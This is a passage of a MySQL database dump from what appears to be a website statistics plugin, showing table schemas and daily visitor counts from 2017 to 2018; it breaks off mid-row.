maryland',34615),(2398,'2018-08-11','google','www.google.com','',34618),(2399,'2018-08-11','google','www.google.com','',34630),(2400,'2018-08-11','google','www.google.com','',34642),(2401,'2018-08-12','google','www.google.com','',34663),(2402,'2018-08-12','google','www.google.com','',34703),(2403,'2018-08-12','google','www.google.com','',34713),(2404,'2018-08-12','google','www.google.com','',34720);
/*!40000 ALTER TABLE `lwz_statistics_search` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_useronline`
--

DROP TABLE IF EXISTS `lwz_statistics_useronline`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_useronline` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(60) NOT NULL,
  `created` int(11) DEFAULT NULL,
  `timestamp` int(10) NOT NULL,
  `date` datetime NOT NULL,
  `referred` text NOT NULL,
  `agent` varchar(255) NOT NULL,
  `platform` varchar(255) DEFAULT NULL,
  `version` varchar(255) DEFAULT NULL,
  `location` varchar(10) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_useronline`
--

LOCK TABLES `lwz_statistics_useronline` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_useronline` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_statistics_useronline` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_visit`
--

DROP TABLE IF EXISTS `lwz_statistics_visit`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_visit` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `last_visit` datetime NOT NULL,
  `last_counter` date NOT NULL,
  `visit` int(10) NOT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `unique_date` (`last_counter`)
) ENGINE=MyISAM AUTO_INCREMENT=549 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_visit`
--

LOCK TABLES `lwz_statistics_visit` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_visit` DISABLE KEYS */;
INSERT INTO `lwz_statistics_visit` VALUES (1,'2017-02-02 20:05:49','2017-02-02',28),(2,'2017-02-03 16:37:18','2017-02-03',54),(3,'2017-02-04 20:05:40','2017-02-04',70),(4,'2017-02-05 20:00:33','2017-02-05',40),(5,'2017-02-06 18:26:08','2017-02-06',298),(6,'2017-02-07 18:50:47','2017-02-07',136),(7,'2017-02-08 19:15:21','2017-02-08',33),(8,'2017-02-09 20:25:46','2017-02-09',75),(9,'2017-02-10 20:01:33','2017-02-10',91),(10,'2017-02-11 20:05:23','2017-02-11',89),(11,'2017-02-12 18:32:30','2017-02-12',78),(12,'2017-02-13 20:24:38','2017-02-13',102),(13,'2017-02-14 19:12:09','2017-02-14',134),(14,'2017-02-15 20:09:57','2017-02-15',96),(15,'2017-02-16 19:43:36','2017-02-16',606),(16,'2017-02-17 18:49:12','2017-02-17',148),(17,'2017-02-18 20:04:05','2017-02-18',159),(18,'2017-02-19 19:04:33','2017-02-19',108),(19,'2017-02-20 19:57:08','2017-02-20',147),(20,'2017-02-21 19:24:10','2017-02-21',182),(21,'2017-02-22 20:24:51','2017-02-22',88),(22,'2017-02-23 20:03:39','2017-02-23',140),(23,'2017-02-24 19:55:34','2017-02-24',148),(24,'2017-02-25 20:07:12','2017-02-25',159),(25,'2017-02-26 19:13:31','2017-02-26',171),(26,'2017-02-27 20:17:01','2017-02-27',237),(27,'2017-02-28 19:03:22','2017-02-28',102),(28,'2017-03-01 19:19:57','2017-03-01',129),(29,'2017-03-02 20:01:33','2017-03-02',75),(30,'2017-03-03 18:53:45','2017-03-03',65),(31,'2017-03-04 20:02:45','2017-03-04',86),(32,'2017-03-05 20:04:20','2017-03-05',114),(33,'2017-03-06 20:21:52','2017-03-06',119),(34,'2017-03-07 20:25:59','2017-03-07',96),(35,'2017-03-08 20:01:42','2017-03-08',82),(36,'2017-03-09 18:37:07','2017-03-09',49),(37,'2017-03-10 18:11:35','2017-03-10',48),(38,'2017-03-11 19:16:38','2017-03-11',122),(39,'2017-03-12 17:58:33','2017-03-12',49),(40,'2017-03-13 19:33:19','2017-03-13',177),(41,'2017-03-14 19:38:55','2017-03-14',95),(42,'2017-03-15 19:42:35','2017-03-15',79),(43,'2017-03-16 19:25:27','2017-03-16',76),(44,'2017-03-17 19:35:46','2017-03-17',165),(45,'2017-03-18 20:19:17','2017-03-18',44),(46,'2017-03-19 19:36:31','2017-03-19',124),(47,'2017-03-20 20:12:26','2017-03-20',151),(48,'2017-03-21 19:59:24','2017-03-21',129),(49,'2017-03-22 19:54:15','2017-03-22',128),(50,'2017-03-23 20:05:55','2017-03-23',132),(51,'2017-03-24 19:52:14','2017-03-24',212),(52,'2017-03-25 18:52:18','2017-03-25',96),(53,'2017-03-26 19:14:44','2017-03-26',80),(54,'2017-03-27 19:47:23','2017-03-27',204),(55,'2017-03-28 19:48:49','2017-03-28',361),(56,'2017-03-29 20:12:53','2017-03-29',115),(57,'2017-03-30 19:04:29','2017-03-30',150),(58,'2017-03-31 18:34:55','2017-03-31',238),(59,'2017-04-01 18:36:33','2017-04-01',89),(60,'2017-04-02 19:11:40','2017-04-02',130),(61,'2017-04-03 20:02:12','2017-04-03',73),(62,'2017-04-04 19:52:42','2017-04-04',91),(63,'2017-04-05 19:43:29','2017-04-05',68),(64,'2017-04-06 19:46:49','2017-04-06',91),(65,'2017-04-07 20:05:26','2017-04-07',76),(66,'2017-04-08 21:05:23','2017-04-08',130),(67,'2017-04-09 19:13:06','2017-04-09',125),(68,'2017-04-10 19:54:41','2017-04-10',202),(69,'2017-04-11 19:57:14','2017-04-11',83),(70,'2017-04-12 19:32:20','2017-04-12',117),(71,'2017-04-13 19:52:50','2017-04-13',65),(72,'2017-04-14 19:06:45','2017-04-14',72),(73,'2017-04-15 19:14:26','2017-04-15',110),(74,'2017-04-16 19:22:02','2017-04-16',28),(75,'2017-04-17 19:47:29','2017-04-17',122),(76,'2017-04-18 19:24:22','2017-04-18',93),(77,'2017-04-19 20:01:36','2017-04-19',104),(78,'2017-04-20 19:45:44','2017-04-20',120),(79,'2017-04-21 19:06:13','2017-04-21',89),(80,'2017-04-22 19:28:46','2017-04-22',124),(81,'2017-04-23 18:21:28','2017-04-23',209),(82,'2017-04-24 19:48:20','2017-04-24',274),(83,'2017-04-25 19:00:48','2017-04-25',63),(84,'2017-04-26 19:27:11','2017-04-26',128),(85,'2017-04-27 17:54:36','2017-04-27',67),(86,'2017-04-28 19:40:36','2017-04-28',57),(87,'2017-04-29 16:19:18','2017-04-29',68),(88,'2017-04-30 19:48:59','2017-04-30',81),(89,'2017-05-01 20:07:51','2017-05-01',141),(90,'2017-05-02 20:10:17','2017-05-02',111),(91,'2017-05-03 19:37:17','2017-05-03',149),(92,'2017-05-04 18:42:16','2017-05-04',60),(93,'2017-05-05 20:09:49','2017-05-05',93),(94,'2017-05-06 20:01:46','2017-05-06',97),(95,'2017-05-07 19:23:26','2017-05-07',57),(96,'2017-05-08 19:36:51','2017-05-08',121),(97,'2017-05-09 20:13:51','2017-05-09',72),(98,'2017-05-10 19:47:40','2017-05-10',175),(99,'2017-05-11 18:51:26','2017-05-11',71),(100,'2017-05-12 20:14:30','2017-05-12',46),(101,'2017-05-13 19:49:16','2017-05-13',55),(102,'2017-05-14 19:27:22','2017-05-14',134),(103,'2017-05-15 20:00:59','2017-05-15',53),(104,'2017-05-16 19:54:27','2017-05-16',53),(105,'2017-05-17 19:40:35','2017-05-17',96),(106,'2017-05-18 19:27:42','2017-05-18',65),(107,'2017-05-19 19:45:02','2017-05-19',60),(108,'2017-05-20 19:09:23','2017-05-20',190),(109,'2017-05-21 19:48:23','2017-05-21',97),(110,'2017-05-22 19:44:34','2017-05-22',196),(111,'2017-05-23 18:05:02','2017-05-23',88),(112,'2017-05-24 20:03:10','2017-05-24',823),(113,'2017-05-25 20:19:27','2017-05-25',149),(114,'2017-05-26 18:02:28','2017-05-26',45),(115,'2017-05-27 18:48:11','2017-05-27',37),(116,'2017-05-28 19:12:43','2017-05-28',44),(117,'2017-05-29 19:56:04','2017-05-29',63),(118,'2017-05-30 19:29:52','2017-05-30',61),(119,'2017-05-31 19:11:36','2017-05-31',50),(120,'2017-06-01 19:29:07','2017-06-01',27),(121,'2017-06-02 18:55:00','2017-06-02',109),(122,'2017-06-03 20:38:30','2017-06-03',58),(123,'2017-06-04 19:22:15','2017-06-04',160),(124,'2017-06-05 19:39:36','2017-06-05',83),(125,'2017-06-06 19:45:51','2017-06-06',96),(126,'2017-06-07 19:50:50','2017-06-07',88),(127,'2017-06-08 20:04:50','2017-06-08',333),(128,'2017-06-09 20:03:21','2017-06-09',102),(129,'2017-06-10 15:55:17','2017-06-10',55),(130,'2017-06-11 20:06:41','2017-06-11',96),(131,'2017-06-12 20:08:13','2017-06-12',107),(132,'2017-06-13 19:01:03','2017-06-13',190),(133,'2017-06-14 20:08:52','2017-06-14',87),(134,'2017-06-15 20:10:56','2017-06-15',79),(135,'2017-06-16 19:46:07','2017-06-16',105),(136,'2017-06-17 19:57:09','2017-06-17',163),(137,'2017-06-18 20:07:58','2017-06-18',173),(138,'2017-06-19 19:46:49','2017-06-19',162),(139,'2017-06-20 20:13:46','2017-06-20',153),(140,'2017-06-21 19:41:57','2017-06-21',74),(141,'2017-06-22 18:52:46','2017-06-22',69),(142,'2017-06-23 17:51:55','2017-06-23',75),(143,'2017-06-24 19:49:00','2017-06-24',54),(144,'2017-06-25 18:46:58','2017-06-25',68),(145,'2017-06-26 20:19:15','2017-06-26',145),(146,'2017-06-27 19:46:56','2017-06-27',232),(147,'2017-06-28 18:34:07','2017-06-28',103),(148,'2017-06-29 20:12:22','2017-06-29',119),(149,'2017-06-30 17:57:12','2017-06-30',86),(150,'2017-07-01 20:45:23','2017-07-01',181),(151,'2017-07-02 19:26:03','2017-07-02',178),(152,'2017-07-03 19:52:15','2017-07-03',93),(153,'2017-07-04 19:50:32','2017-07-04',91),(154,'2017-07-05 20:00:37','2017-07-05',295),(155,'2017-07-06 20:01:30','2017-07-06',82),(156,'2017-07-07 19:28:37','2017-07-07',79),(157,'2017-07-08 19:46:48','2017-07-08',86),(158,'2017-07-09 19:49:23','2017-07-09',284),(159,'2017-07-10 20:03:46','2017-07-10',129),(160,'2017-07-11 19:21:52','2017-07-11',144),(161,'2017-07-12 20:05:35','2017-07-12',105),(162,'2017-07-13 19:37:19','2017-07-13',95),(163,'2017-07-14 18:03:09','2017-07-14',90),(164,'2017-07-15 20:58:25','2017-07-15',77),(165,'2017-07-16 19:51:40','2017-07-16',89),(166,'2017-07-17 19:27:07','2017-07-17',182),(167,'2017-07-18 20:01:13','2017-07-18',89),(168,'2017-07-19 18:26:39','2017-07-19',77),(169,'2017-07-20 22:27:19','2017-07-20',130),(170,'2017-07-21 19:40:41','2017-07-21',99),(171,'2017-07-22 20:01:25','2017-07-22',112),(172,'2017-07-23 20:02:50','2017-07-23',71),(173,'2017-07-24 19:37:39','2017-07-24',187),(174,'2017-07-25 20:03:26','2017-07-25',113),(175,'2017-07-26 19:02:52','2017-07-26',100),(176,'2017-07-27 19:51:56','2017-07-27',117),(177,'2017-07-28 19:31:04','2017-07-28',97),(178,'2017-07-29 17:50:42','2017-07-29',63),(179,'2017-07-30 19:55:09','2017-07-30',186),(180,'2017-07-31 20:00:35','2017-07-31',145),(181,'2017-08-01 20:14:11','2017-08-01',127),(182,'2017-08-02 20:01:23','2017-08-02',110),(183,'2017-08-03 19:54:15','2017-08-03',134),(184,'2017-08-04 19:40:09','2017-08-04',91),(185,'2017-08-05 20:04:54','2017-08-05',102),(186,'2017-08-06 19:49:18','2017-08-06',121),(187,'2017-08-07 20:09:07','2017-08-07',291),(188,'2017-08-08 19:48:17','2017-08-08',135),(189,'2017-08-09 19:30:38','2017-08-09',125),(190,'2017-08-10 19:23:07','2017-08-10',88),(191,'2017-08-11 19:59:37','2017-08-11',123),(192,'2017-08-12 20:05:18','2017-08-12',78),(193,'2017-08-13 18:49:53','2017-08-13',263),(194,'2017-08-14 19:00:34','2017-08-14',195),(195,'2017-08-15 19:41:27','2017-08-15',119),(196,'2017-08-16 19:46:00','2017-08-16',163),(197,'2017-08-17 20:14:17','2017-08-17',144),(198,'2017-08-18 19:58:41','2017-08-18',346),(199,'2017-08-19 19:26:23','2017-08-19',445),(200,'2017-08-20 19:37:49','2017-08-20',98),(201,'2017-08-21 20:10:14','2017-08-21',147),(202,'2017-08-22 19:11:35','2017-08-22',106),(203,'2017-08-23 19:57:25','2017-08-23',277),(204,'2017-08-24 19:37:52','2017-08-24',110),(205,'2017-08-25 20:10:56','2017-08-25',149),(206,'2017-08-26 20:05:11','2017-08-26',158),(207,'2017-08-27 19:56:36','2017-08-27',109),(208,'2017-08-28 20:18:34','2017-08-28',179),(209,'2017-08-29 20:04:06','2017-08-29',263),(210,'2017-08-30 19:51:30','2017-08-30',242),(211,'2017-08-31 19:35:59','2017-08-31',147),(212,'2017-09-01 20:05:01','2017-09-01',360),(213,'2017-09-02 19:46:48','2017-09-02',196),(214,'2017-09-03 19:47:19','2017-09-03',122),(215,'2017-09-04 19:57:44','2017-09-04',220),(216,'2017-09-05 19:11:20','2017-09-05',228),(217,'2017-09-06 19:58:40','2017-09-06',367),(218,'2017-09-07 19:50:41','2017-09-07',236),(219,'2017-09-08 18:10:10','2017-09-08',209),(220,'2017-09-09 19:28:14','2017-09-09',142),(221,'2017-09-10 19:51:08','2017-09-10',179),(222,'2017-09-11 20:34:51','2017-09-11',241),(223,'2017-09-12 19:57:30','2017-09-12',195),(224,'2017-09-13 20:25:36','2017-09-13',219),(225,'2017-09-14 18:58:38','2017-09-14',181),(226,'2017-09-15 20:06:33','2017-09-15',347),(227,'2017-09-16 20:06:29','2017-09-16',897),(228,'2017-09-17 20:06:40','2017-09-17',784),(229,'2017-09-18 18:45:35','2017-09-18',399),(230,'2017-09-19 20:15:05','2017-09-19',138),(231,'2017-09-20 19:50:13','2017-09-20',139),(232,'2017-09-21 19:54:40','2017-09-21',117),(233,'2017-09-22 19:51:51','2017-09-22',120),(234,'2017-09-23 18:48:40','2017-09-23',233),(235,'2017-09-24 19:19:48','2017-09-24',69),(236,'2017-09-25 19:18:40','2017-09-25',204),(237,'2017-09-26 20:13:44','2017-09-26',266),(238,'2017-09-27 19:46:36','2017-09-27',198),(239,'2017-09-28 20:06:45','2017-09-28',139),(240,'2017-09-29 19:54:51','2017-09-29',192),(241,'2017-09-30 19:54:34','2017-09-30',155),(242,'2017-10-01 19:15:57','2017-10-01',130),(243,'2017-10-02 19:46:37','2017-10-02',232),(244,'2017-10-03 19:37:14','2017-10-03',186),(245,'2017-10-04 20:15:24','2017-10-04',169),(246,'2017-10-05 19:50:08','2017-10-05',204),(247,'2017-10-06 20:09:20','2017-10-06',1755),(248,'2017-10-07 20:31:45','2017-10-07',173),(249,'2017-10-08 20:17:23','2017-10-08',237),(250,'2017-10-09 20:04:54','2017-10-09',306),(251,'2017-10-10 20:17:26','2017-10-10',114),(252,'2017-10-11 20:08:09','2017-10-11',178),(253,'2017-10-12 20:07:31','2017-10-12',295),(254,'2017-10-13 20:07:57','2017-10-13',177),(255,'2017-10-14 20:06:48','2017-10-14',284),(256,'2017-10-15 20:15:16','2017-10-15',169),(257,'2017-10-16 20:07:19','2017-10-16',212),(258,'2017-10-17 20:05:31','2017-10-17',201),(259,'2017-10-18 20:05:19','2017-10-18',520),(260,'2017-10-19 20:07:26','2017-10-19',170),(261,'2017-10-20 19:43:03','2017-10-20',150),(262,'2017-10-21 20:12:01','2017-10-21',182),(263,'2017-10-22 20:12:43','2017-10-22',192),(264,'2017-10-23 20:08:49','2017-10-23',87),(265,'2017-10-24 19:56:19','2017-10-24',89),(266,'2017-10-25 20:07:02','2017-10-25',134),(267,'2017-10-26 17:54:52','2017-10-26',79),(268,'2017-10-27 20:06:41','2017-10-27',62),(269,'2017-10-28 19:58:00','2017-10-28',92),(270,'2017-10-29 19:13:30','2017-10-29',56),(271,'2017-10-30 20:22:21','2017-10-30',77),(272,'2017-10-31 19:33:37','2017-10-31',59),(273,'2017-11-01 19:57:55','2017-11-01',81),(274,'2017-11-02 19:52:36','2017-11-02',78),(275,'2017-11-03 20:25:56','2017-11-03',93),(276,'2017-11-04 20:04:52','2017-11-04',94),(277,'2017-11-05 20:09:20','2017-11-05',57),(278,'2017-11-06 20:04:00','2017-11-06',351),(279,'2017-11-07 20:08:16','2017-11-07',245),(280,'2017-11-08 19:57:55','2017-11-08',107),(281,'2017-11-09 19:47:24','2017-11-09',115),(282,'2017-11-10 19:57:12','2017-11-10',102),(283,'2017-11-11 20:07:42','2017-11-11',96),(284,'2017-11-12 19:38:55','2017-11-12',46),(285,'2017-11-13 18:36:08','2017-11-13',203),(286,'2017-11-14 16:20:27','2017-11-14',66),(287,'2017-11-15 18:55:14','2017-11-15',77),(288,'2017-11-16 18:49:26','2017-11-16',47),(289,'2017-11-17 20:00:52','2017-11-17',144),(290,'2017-11-18 20:32:53','2017-11-18',73),(291,'2017-11-19 19:37:26','2017-11-19',88),(292,'2017-11-20 20:21:43','2017-11-20',128),(293,'2017-11-21 20:04:51','2017-11-21',82),(294,'2017-11-22 19:33:54','2017-11-22',93),(295,'2017-11-23 20:06:12','2017-11-23',72),(296,'2017-11-24 19:45:55','2017-11-24',62),(297,'2017-11-25 19:59:41','2017-11-25',69),(298,'2017-11-26 20:05:51','2017-11-26',183),(299,'2017-11-27 20:08:56','2017-11-27',370),(300,'2017-11-28 21:03:59','2017-11-28',166),(301,'2017-11-29 19:35:25','2017-11-29',185),(302,'2017-11-30 20:22:52','2017-11-30',144),(303,'2017-12-01 20:20:23','2017-12-01',211),(304,'2017-12-02 20:18:40','2017-12-02',279),(305,'2017-12-03 20:18:02','2017-12-03',215),(306,'2017-12-04 20:21:29','2017-12-04',221),(307,'2017-12-05 20:08:45','2017-12-05',293),(308,'2017-12-06 20:07:27','2017-12-06',426),(309,'2017-12-07 20:15:14','2017-12-07',200),(310,'2017-12-08 20:06:38','2017-12-08',168),(311,'2017-12-09 20:41:09','2017-12-09',129),(312,'2017-12-10 20:24:12','2017-12-10',117),(313,'2017-12-11 20:10:05','2017-12-11',443),(314,'2017-12-12 20:09:57','2017-12-12',388),(315,'2017-12-13 20:20:16','2017-12-13',484),(316,'2017-12-14 20:22:59','2017-12-14',370),(317,'2017-12-15 20:06:33','2017-12-15',462),(318,'2017-12-16 20:12:30','2017-12-16',715),(319,'2017-12-17 20:18:59','2017-12-17',371),(320,'2017-12-18 20:11:03','2017-12-18',710),(321,'2017-12-19 20:14:45','2017-12-19',715),(322,'2017-12-20 19:45:51','2017-12-20',597),(323,'2017-12-21 20:09:37','2017-12-21',796),(324,'2017-12-22 20:06:16','2017-12-22',1028),(325,'2017-12-23 19:35:21','2017-12-23',688),(326,'2017-12-24 20:06:42','2017-12-24',4091),(327,'2017-12-25 20:06:00','2017-12-25',2335),(328,'2017-12-26 17:14:30','2017-12-26',5946),(329,'0000-00-00 00:00:00','2018-01-07',119),(330,'2018-01-06 21:41:19','2018-01-06',2),(331,'2018-01-08 20:03:48','2018-01-08',135),(332,'2018-01-09 20:04:10','2018-01-09',171),(333,'2018-01-10 20:05:51','2018-01-10',111),(334,'2018-01-11 19:27:35','2018-01-11',96),(335,'2018-01-12 20:00:27','2018-01-12',140),(336,'2018-01-13 19:58:02','2018-01-13',91),(337,'2018-01-14 19:30:05','2018-01-14',226),(338,'2018-01-15 20:07:32','2018-01-15',143),(339,'2018-01-16 20:37:34','2018-01-16',215),(340,'2018-01-17 20:17:24','2018-01-17',208),(341,'2018-01-18 19:32:56','2018-01-18',137),(342,'2018-01-19 20:04:49','2018-01-19',110),(343,'2018-01-20 19:22:30','2018-01-20',333),(344,'2018-01-21 19:41:28','2018-01-21',118),(345,'2018-01-22 20:20:57','2018-01-22',129),(346,'2018-01-23 19:47:36','2018-01-23',143),(347,'2018-01-24 20:08:55','2018-01-24',144),(348,'2018-01-25 20:02:44','2018-01-25',107),(349,'2018-01-26 20:27:19','2018-01-26',99),(350,'2018-01-27 20:05:20','2018-01-27',112),(351,'2018-01-28 20:01:52','2018-01-28',103),(352,'2018-01-29 20:11:40','2018-01-29',131),(353,'2018-01-30 20:08:50','2018-01-30',292),(354,'2018-01-31 20:09:59','2018-01-31',416),(355,'2018-02-01 20:04:42','2018-02-01',320),(356,'2018-02-02 20:39:31','2018-02-02',421),(357,'2018-02-03 20:05:54','2018-02-03',406),(358,'2018-02-04 20:21:02','2018-02-04',425),(359,'2018-02-05 20:13:58','2018-02-05',409),(360,'2018-02-06 20:04:23','2018-02-06',454),(361,'2018-02-07 20:07:19','2018-02-07',468),(362,'2018-02-08 20:03:32','2018-02-08',423),(363,'2018-02-09 20:26:22','2018-02-09',482),(364,'2018-02-10 19:56:32','2018-02-10',533),(365,'2018-02-11 19:55:47','2018-02-11',502),(366,'2018-02-12 20:08:01','2018-02-12',585),(367,'2018-02-13 19:33:18','2018-02-13',471),(368,'2018-02-14 19:59:53','2018-02-14',520),(369,'2018-02-15 20:38:09','2018-02-15',529),(370,'2018-02-16 19:46:54','2018-02-16',519),(371,'2018-02-17 19:59:28','2018-02-17',556),(372,'2018-02-18 20:17:31','2018-02-18',520),(373,'2018-02-19 19:57:49','2018-02-19',533),(374,'2018-02-20 19:59:51','2018-02-20',562),(375,'2018-02-21 20:05:55','2018-02-21',496),(376,'2018-02-22 20:06:30','2018-02-22',428),(377,'2018-02-23 20:09:29','2018-02-23',459),(378,'2018-02-24 20:18:19','2018-02-24',582),(379,'2018-02-25 20:08:04','2018-02-25',682),(380,'2018-02-26 20:03:19','2018-02-26',543),(381,'2018-02-27 19:25:38','2018-02-27',297),(382,'2018-02-28 20:02:08','2018-02-28',219),(383,'2018-03-01 19:57:24','2018-03-01',188),(384,'2018-03-02 20:00:32','2018-03-02',183),(385,'2018-03-03 20:03:52','2018-03-03',132),(386,'2018-03-04 20:09:57','2018-03-04',134),(387,'2018-03-05 19:56:12','2018-03-05',124),(388,'2018-03-06 19:58:18','2018-03-06',168),(389,'2018-03-07 19:28:54','2018-03-07',145),(390,'2018-03-08 18:55:12','2018-03-08',217),(391,'2018-03-09 19:35:10','2018-03-09',173),(392,'2018-03-10 19:41:38','2018-03-10',175),(393,'2018-03-11 19:47:32','2018-03-11',184),(394,'2018-03-12 20:01:43','2018-03-12',303),(395,'2018-03-13 19:52:43','2018-03-13',254),(396,'2018-03-14 20:02:00','2018-03-14',218),(397,'2018-03-15 20:04:17','2018-03-15',210),(398,'2018-03-16 19:50:20','2018-03-16',190),(399,'2018-03-17 19:38:02','2018-03-17',164),(400,'2018-03-18 19:36:05','2018-03-18',117),(401,'2018-03-19 20:04:11','2018-03-19',110),(402,'2018-03-20 19:52:43','2018-03-20',179),(403,'2018-03-21 20:09:27','2018-03-21',238),(404,'2018-03-22 19:52:11','2018-03-22',236),(405,'2018-03-23 19:49:09','2018-03-23',200),(406,'2018-03-24 19:46:56','2018-03-24',238),(407,'2018-03-25 20:04:25','2018-03-25',372),(408,'2018-03-26 19:51:02','2018-03-26',307),(409,'2018-03-27 20:25:16','2018-03-27',199),(410,'2018-03-28 20:25:40','2018-03-28',217),(411,'2018-03-29 20:04:43','2018-03-29',258),(412,'2018-03-30 20:17:46','2018-03-30',259),(413,'2018-03-31 19:07:25','2018-03-31',230),(414,'2018-04-01 19:45:25','2018-04-01',275),(415,'2018-04-02 20:11:38','2018-04-02',167),(416,'2018-04-03 19:09:16','2018-04-03',117),(417,'2018-04-04 20:34:33','2018-04-04',138),(418,'2018-04-05 19:58:23','2018-04-05',144),(419,'2018-04-06 20:12:31','2018-04-06',194),(420,'2018-04-07 20:44:02','2018-04-07',101),(421,'2018-04-08 19:46:09','2018-04-08',157),(422,'2018-04-09 20:20:45','2018-04-09',216),(423,'2018-04-10 20:02:38','2018-04-10',142),(424,'2018-04-11 19:32:00','2018-04-11',174),(425,'2018-04-12 19:48:41','2018-04-12',103),(426,'2018-04-13 19:22:35','2018-04-13',301),(427,'2018-04-14 20:52:51','2018-04-14',82),(428,'2018-04-15 20:05:24','2018-04-15',100),(429,'2018-04-16 20:00:10','2018-04-16',145),(430,'2018-04-17 19:53:07','2018-04-17',126),(431,'2018-04-18 19:48:58','2018-04-18',128),(432,'2018-04-19 20:11:13','2018-04-19',120),(433,'2018-04-20 19:42:14','2018-04-20',80),(434,'2018-04-21 19:58:57','2018-04-21',107),(435,'2018-04-22 20:06:59','2018-04-22',140),(436,'2018-04-23 19:42:18','2018-04-23',175),(437,'2018-04-24 19:52:29','2018-04-24',132),(438,'2018-04-25 19:42:29','2018-04-25',172),(439,'2018-04-26 20:06:18','2018-04-26',122),(440,'2018-04-27 20:32:36','2018-04-27',133),(441,'2018-04-28 18:49:17','2018-04-28',75),(442,'2018-04-29 19:48:43','2018-04-29',83),(443,'2018-04-30 20:19:16','2018-04-30',142),(444,'2018-05-01 20:15:11','2018-05-01',94),(445,'2018-05-02 20:33:14','2018-05-02',111),(446,'2018-05-03 19:59:08','2018-05-03',140),(447,'2018-05-04 20:23:50','2018-05-04',100),(448,'2018-05-05 20:17:52','2018-05-05',103),(449,'2018-05-06 20:15:00','2018-05-06',165),(450,'2018-05-07 19:42:27','2018-05-07',154),(451,'2018-05-08 20:13:57','2018-05-08',126),(452,'2018-05-09 20:32:32','2018-05-09',92),(453,'2018-05-10 20:40:35','2018-05-10',76),(454,'2018-05-11 19:59:14','2018-05-11',90),(455,'2018-05-12 19:20:57','2018-05-12',108),(456,'2018-05-13 19:21:42','2018-05-13',81),(457,'2018-05-14 19:14:15','2018-05-14',75),(458,'2018-05-15 20:12:29','2018-05-15',113),(459,'2018-05-16 21:21:42','2018-05-16',73),(460,'2018-05-17 18:36:36','2018-05-17',140),(461,'2018-05-18 20:18:26','2018-05-18',57),(462,'2018-05-19 19:51:27','2018-05-19',76),(463,'2018-05-20 20:03:29','2018-05-20',83),(464,'2018-05-21 20:19:46','2018-05-21',154),(465,'2018-05-22 20:06:33','2018-05-22',74),(466,'2018-05-23 19:51:16','2018-05-23',95),(467,'2018-05-24 20:17:17','2018-05-24',86),(468,'2018-05-25 19:48:54','2018-05-25',132),(469,'2018-05-26 19:07:26','2018-05-26',50),(470,'2018-05-27 16:39:01','2018-05-27',92),(471,'2018-05-28 20:41:00','2018-05-28',46),(472,'2018-05-29 19:32:26','2018-05-29',146),(473,'2018-05-30 18:04:28','2018-05-30',84),(474,'2018-05-31 20:18:38','2018-05-31',81),(475,'2018-06-01 20:38:30','2018-06-01',102),(476,'2018-06-02 20:10:16','2018-06-02',88),(477,'2018-06-03 19:46:36','2018-06-03',81),(478,'2018-06-04 20:48:41','2018-06-04',129),(479,'2018-06-05 19:30:19','2018-06-05',93),(480,'2018-06-06 20:06:30','2018-06-06',86),(481,'2018-06-07 20:51:21','2018-06-07',82),(482,'2018-06-08 20:29:46','2018-06-08',109),(483,'2018-06-09 20:13:32','2018-06-09',117),(484,'2018-06-10 19:07:46','2018-06-10',77),(485,'2018-06-11 17:53:15','2018-06-11',133),(486,'2018-06-12 20:10:35','2018-06-12',184),(487,'2018-06-13 20:14:56','2018-06-13',222),(488,'2018-06-14 20:27:07','2018-06-14',123),(489,'2018-06-15 19:54:00','2018-06-15',88),(490,'2018-06-16 20:23:36','2018-06-16',59),(491,'2018-06-17 20:32:44','2018-06-17',82),(492,'2018-06-18 19:26:40','2018-06-18',112),(493,'2018-06-19 20:08:11','2018-06-19',88),(494,'2018-06-20 20:12:35','2018-06-20',142),(495,'2018-06-21 21:15:15','2018-06-21',80),(496,'2018-06-22 20:28:20','2018-06-22',86),(497,'2018-06-23 20:32:32','2018-06-23',77),(498,'2018-06-24 20:34:33','2018-06-24',99),(499,'2018-06-25 19:41:53','2018-06-25',59),(500,'2018-06-26 20:11:29','2018-06-26',124),(501,'2018-06-27 19:31:44','2018-06-27',69),(502,'2018-06-28 19:55:46','2018-06-28',121),(503,'2018-06-29 19:32:25','2018-06-29',59),(504,'2018-06-30 19:37:40','2018-06-30',93),(505,'2018-07-01 19:44:28','2018-07-01',127),(506,'2018-07-02 19:49:58','2018-07-02',300),(507,'2018-07-03 19:29:20','2018-07-03',100),(508,'2018-07-04 19:57:23','2018-07-04',91),(509,'2018-07-05 20:00:22','2018-07-05',130),(510,'2018-07-06 20:07:27','2018-07-06',113),(511,'2018-07-07 21:02:10','2018-07-07',93),(512,'2018-07-08 20:53:20','2018-07-08',144),(513,'2018-07-09 19:18:40','2018-07-09',72),(514,'2018-07-10 20:36:59','2018-07-10',91),(515,'2018-07-11 20:18:00','2018-07-11',101),(516,'2018-07-12 20:08:48','2018-07-12',120),(517,'2018-07-13 20:32:20','2018-07-13',72),(518,'2018-07-14 19:59:34','2018-07-14',83),(519,'2018-07-15 19:51:08','2018-07-15',94),(520,'2018-07-16 19:40:59','2018-07-16',113),(521,'2018-07-17 19:57:27','2018-07-17',89),(522,'2018-07-18 19:17:28','2018-07-18',111),(523,'2018-07-19 20:21:14','2018-07-19',105),(524,'2018-07-20 19:55:20','2018-07-20',112),(525,'2018-07-21 19:37:19','2018-07-21',84),(526,'2018-07-22 21:00:31','2018-07-22',95),(527,'2018-07-23 20:23:19','2018-07-23',80),(528,'2018-07-24 20:17:13','2018-07-24',171),(529,'2018-07-25 18:42:18','2018-07-25',136),(530,'2018-07-26 19:43:19','2018-07-26',159),(531,'2018-07-27 